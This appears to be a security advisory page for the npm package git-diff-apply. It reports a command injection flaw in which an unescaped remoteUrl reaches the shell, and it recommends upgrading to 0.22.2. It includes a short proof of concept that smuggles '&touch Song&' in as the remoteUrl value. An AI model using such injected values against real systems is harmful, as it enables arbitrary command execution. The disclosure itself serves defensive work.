git-diff-apply@0.18.0 vulnerabilities

Use an unrelated remote repository to apply a git diff

  • latest version

    6.0.6

  • latest non vulnerable version

  • first published

    7 years ago

  • latest version published

    27 days ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the git-diff-apply package. This does not include vulnerabilities belonging to this package’s dependencies.

    Vulnerability | Vulnerable Version
    • H
    Command Injection

    git-diff-apply is a package that can be used to reach an unrelated remote repository to apply a git diff.

    Affected versions of this package are vulnerable to Command Injection. In the "index.js" file, at line 240, the run command executes the git command with a user-controlled variable called remoteUrl.

    PoC by JHU System Security Lab

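    var root = require("git-diff-apply");
    // remoteUrl reaches the shell unescaped, so the text between the & separators runs as its own command
    var attack_code = "&touch Song&";
    root({"remoteUrl": attack_code, "startTag": "none"});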
    

    How to fix Command Injection?

    Upgrade git-diff-apply to version 0.22.2 or higher.

    Vulnerable Version: <0.22.2